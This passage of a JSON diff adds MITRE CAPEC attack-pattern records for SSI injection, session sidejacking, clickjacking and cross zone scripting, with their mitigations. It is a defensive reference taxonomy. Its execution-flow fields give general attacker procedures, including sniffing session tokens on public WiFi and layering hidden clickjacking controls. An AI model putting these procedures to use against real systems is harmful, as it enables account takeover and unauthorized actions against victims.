"course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--394fe1bb-8b4d-4638-b4e8-2a5719efe438", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--774c708f-2480-4cee-8e04-c42d603760e8", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d04362e0-439c-40a1-bfa2-cbddb7b33bbd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use OS-level preventative functionality. Not a complete solution.", + "id": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aae34f4-823f-43ac-90e9-fa33251c4236", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", + "id": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f190864-e6a8-45f8-af58-75124f4f4914", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.", + "external_references": [ + { + "external_id": "CAPEC-101", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/101.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "SSI Injection", + "external_id": "36", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SSI-Injection" + }, + { + "description": "Server-Side Includes (SSI) Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-610", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html" + } + ], + "id": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Server Side Include (SSI) Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \"Options Includes\" directive enabled.\n Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.\n When these logs are eventually reviewed, the server parses the SSI directives and executes them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine applicability: The adversary determines whether server side includes are enabled on the target web server.

    2. Techniques
    Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.
    Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.

Experiment

  1. Find Injection Point: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Exploit

  1. Inject SSI: Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A web server that supports server side includes and has them enabled", + "User controllable input that can carry include directives to the web server" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", + "id": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3428ab3f-34a5-436a-98f2-9be0a5397f94", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", + "id": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c9bb040-3574-49f1-bec3-723afe52faa1", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead", + "id": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c92c5203-00ee-424c-a58b-d36d36695f03", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", + "external_references": [ + { + "external_id": "CAPEC-102", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/102.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-523", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/523.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-614", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/614.html" + } + ], + "id": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Session Sidejacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Unprotected Session Token Transfer: The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

    2. Techniques
    The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Experiment

  1. Capture session token: The attacker uses sniffing tools to capture a session token from traffic.

  2. Insert captured session token: The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker and the victim are both using the same WiFi network.", + "The victim has an active session with a target system.", + "The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)", + "The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \"rings home\" asynchronously using the session token" + ], + "x_capec_resources_required": [ + "A packet sniffing tool, such as wireshark, can be used to capture session information." + ], + "x_capec_skills_required": { + "Low": "Easy to use tools exist to automate this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b42f764-6aa4-4c32-a752-c814178db08c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.", + "id": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66376c3d-cedd-4a2e-9fd6-1737edda9a5e", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system.", + "external_references": [ + { + "external_id": "CAPEC-103", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/103.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Clickjacking", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Clickjacking" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-619", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html" + } + ], + "id": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Clickjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft a clickjacking page: The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page

    2. Techniques
    The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged cross-frame scripting to craft a malicious clickjacking page

Exploit

  1. Adversary lures victim to clickjacking page: Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.

    2. Techniques
    Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Lure the victim to the malicious site through a cross-site scripting attack.

  2. Trick victim into interacting with the clickjacking page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

    3. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408" + ], + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client", + "The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.", + "The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)", + "The victim has an active session with the target system.", + "The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site are not trivial tasks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9b7917-b0c4-4461-93c3-7c9623a1eca8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Turn off JavaScript, Flash and disable CSS.", + "id": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c711dc9-c190-43bc-a5e0-02855f1b48e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--591f6f0b-24c7-4594-9450-5a3ca2a41ad7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.", + "external_references": [ + { + "external_id": "CAPEC-104", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/104.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-638", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/638.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Zone Scripting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local 